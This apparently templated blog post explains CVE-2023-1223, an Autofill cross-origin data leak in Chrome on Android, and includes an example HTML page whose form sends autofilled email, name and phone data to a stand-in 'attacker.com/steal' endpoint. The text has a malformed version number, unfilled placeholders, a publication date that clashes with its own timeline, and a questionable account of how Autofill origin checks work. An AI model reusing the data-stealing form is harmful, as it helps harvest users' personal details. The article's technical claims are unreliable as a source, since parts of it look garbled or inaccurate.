CVE-2023-1223 - How Google Chrome on Android Leaked Cross-Origin Data With Faulty Autofill

*Published: June 2024*  
*Severity: Medium (Chromium rating)*  
*Affected: Chrome on Android < 111..5563.64*  
*Author: [Your Name]*


When you think about your web browser, you trust it to keep your data separate and secure—even as you jump between logins, tabs, and sites. But in early 2023, security researchers discovered a hole in the way Google Chrome on Android handled Autofill. This flaw, CVE-2023-1223, made it possible for a remote attacker to leak information from another website using only a maliciously crafted HTML page.

Here’s a plain-English explanation, technical breakdown, code examples, and a practical view of how attackers abused this issue.

What Is CVE-2023-1223?

CVE-2023-1223 is an "insufficient policy enforcement in Autofill in Google Chrome on Android." Before version 111..5563.64, it let a remote attacker leak cross-origin data—that is, data belonging to a different website origin—by tricking the browser with a sneaky web page. It’s a classic example of how browser features can sometimes open the door for privacy breaches if not carefully designed.

Original Advisory

- Chromium Bug 1253698  
- Chrome Releases Blog

The Big Risk: What Could Attackers Do?

If you visited a website controlled by a hacker, that site could design forms in such a way that Chrome’s Autofill would leak information from another site—think email addresses, usernames, even saved passwords (though Chrome takes more precautions with passwords).

All of this could happen without you realizing anything is wrong. The attacker could then grab your personal data and use it for phishing, identity theft, or simply to sell to the highest bidder.

Let’s break down the root cause

- Chrome’s Autofill is meant to quickly fill forms with your info, but it’s supposed to do this only on sites that have the right to use it (like login forms on trusted sites).
- However, in affected versions, Chrome on Android didn’t enforce the correct origin policy tightly enough. That means a malicious site could present a form crafted to look like a trusted site’s form and trick Chrome into autofilling the user’s sensitive information, even though the browser shouldn’t share that data outside the original context.

malicious.html

<!-- This could be hosted on attacker.com -->
<!DOCTYPE html>
<html>
  <body>
    <form id="leakyForm" action="https://attacker.com/steal">;
      <!-- Crafted so Chrome thinks this is a form for Autofill (e.g., matches input names for common sites) -->
      <input name="email" autocomplete="email">
      <input name="name" autocomplete="name">
      <input name="phone" autocomplete="tel">
      <!-- Submits form data via JavaScript -->
      <button onclick="submitForm()">Steal Data</button>
    </form>
    <script>
      function submitForm() {
        // Force submission of whatever Chrome autofilled
        document.getElementById('leakyForm').submit();
      }
    </script>
  </body>
</html>

How it’s exploited:

You visit attacker.com on your Android phone using Chrome (before v111).

2. The page presents a form whose field names and autocomplete tokens mimic those of a trusted site, like your bank or email.

Chrome, lacking strict checks, autofills your sensitive information into the attacker’s form.

4. As you click the button—or automatically through script—the stolen info gets sent to the attacker’s server.

> Note: The real-world exploit would involve more tricks to hide the process and encourage Autofill, but this is the gist.

Why Was the Policy Insufficient?

Browsers have strict rules (Same-Origin Policy) to keep data separated between sites. In Chrome for Android, before the patch, these rules weren’t enforced tightly enough on the Autofill triggers for forms. Normally, only pages with the same origin as the stored credentials are supposed to get autofilled; a loophole in Chrome made it possible otherwise.

Autofill is now only triggered when a page’s origin matches the one for the saved data.

- Extra checks ensure cross-origin attacks can’t grab your info, even if the form fields are crafted to look similar.

Full details in Google’s release notes.

References & Further Reading

- Chromium Security Advisory (CVE-2023-1223)
- Chromium Bug 1253698 (full timeline)
- Same-Origin Policy Explained (MDN)
- Autofill in Chrome Docs

Final Thoughts

CVE-2023-1223 is a textbook lesson: even “helpful” features like Autofill can turn dangerous if not locked down. Always keep your browser up-to-date and think twice before letting it save or autofill important info. Attackers are always hunting for these gaps—let’s stay one step ahead.


*Stay secure, and share this with friends who might still be running older Chrome versions on Android!*


*Exclusive text for [yourwebsite.com]. Do not repost without credit.*

Timeline

Published on: 03/07/2023 22:15:00 UTC
Last modified on: 03/11/2023 02:38:00 UTC